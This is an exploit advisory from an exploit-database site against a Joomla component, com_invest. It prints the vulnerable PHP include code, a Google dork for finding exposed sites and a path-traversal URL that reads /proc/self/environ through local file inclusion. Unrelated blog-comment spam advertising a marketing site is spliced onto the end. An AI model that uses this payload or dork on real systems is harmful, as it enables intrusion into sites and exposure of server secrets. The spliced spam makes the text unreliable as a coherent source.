1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Caddy-dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
####
# Exploit Title: Joomla Component com_invest LFI Vulnerability
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/ALG.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# Plugin: http://software.skuzet.nl/component/option,com_phocadownload/Itemid,3/id,7/view,category/
# Google Dork: [inurl:index.php?option=com_invest controller=]
# Security Risk: medium
# Tested on: Windows Seven Edition Integral / French
####
# Sp Greetz To 1337day Team
[*] Vulnerable Code :
// get controller
if ($controller = JRequest::getVar('view')) {
$path = JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php';
if (file_exists($path)) {
require_once($path);
} else {
JError::raiseError(JText::_('unknown controller'));
}
[*] Exploit :
http://127.0.0.1/joomla/index.php?com_invest&controller=../../../../../../../../../proc/self/environ
Every weekend i used to pay a quick visit this website, as i wish for enjoyment,
ReplyDeletesince this this website conations really nice funny information too.
Feel free to surf to my site :: video marketing company